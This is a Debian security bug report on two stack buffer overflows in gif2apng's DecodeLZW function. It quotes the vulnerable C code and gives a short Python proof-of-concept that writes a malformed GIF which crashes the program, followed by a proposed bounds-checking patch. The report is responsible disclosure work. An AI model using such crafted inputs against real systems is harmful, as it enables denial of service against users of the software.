Bug#1002669: gif2apng: Two stack based buffer overflows in the DecodeLZW function
Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security
Dear Maintainer,
There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:
void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
unsigned int j;
unsigned int size = 0;
unsigned int accum = 0;
unsigned short prefix[4097];
unsigned char suffix[4097];
unsigned char str[4097];
unsigned char data[1024];
unsigned char firstchar = 0;
unsigned char *pstr = str;
unsigned char *pout = img;
unsigned char mincodesize;
if (fread(&mincodesize, 1, 1, f1) != 1) return;
bits = 0;
codesize = mincodesize + 1;
codemask = (1 << codesize) - 1;
clearcode = 1 << mincodesize;
nextcode = clearcode + 2;
lastcode = -1;
for (i=0; i<clearcode; i++)
suffix[i] = i;
[...]
while (code >= clearcode)
{
*pstr++ = suffix[code];
code = prefix[code];
}
In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix[code] results in the same code again.
I wrote the following script to generate a poc.gif file:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)
mincode = b"\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\x10"
f.write(mincode)
# Size value and byte we write to the heap
target_char = b"\x01" + b"\xff\xfe"*10000
f.write(target_char)
f.close()
The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
Speicherzugriffsfehler
As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.
I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:
if (clearcode > 4097) { // Added to avoid stack overflow here
printf("Invalid Image\n");
exit(0);
}
for (i=0; i<clearcode; i++)
suffix[i] = i;
[...]
if (code >= nextcode)
{
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = firstchar;
write_counter++;
code = lastcode;
}
else {
printf("Invalid Image\n");
exit(0);
}
}
while (code >= clearcode)
{
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = suffix[code];
write_counter++;
code = prefix[code];
}
else {
printf("Invalid Image\n");
exit(0);
}
}
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = firstchar = suffix[code];
write_counter++;
}
else {
printf("Invalid Image\n");
exit(0);
}
This seemed to fix the issue for me locally, but it could use some more testing.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages gif2apng depends on:
ii libc6 2.28-10
ii libzopfli1 1.0.2-1
ii zlib1g 1:1.2.11.dfsg-1
gif2apng recommends no packages.
Versions of packages gif2apng suggests:
pn apng2gif <none>
-- no debconf information
Reply to: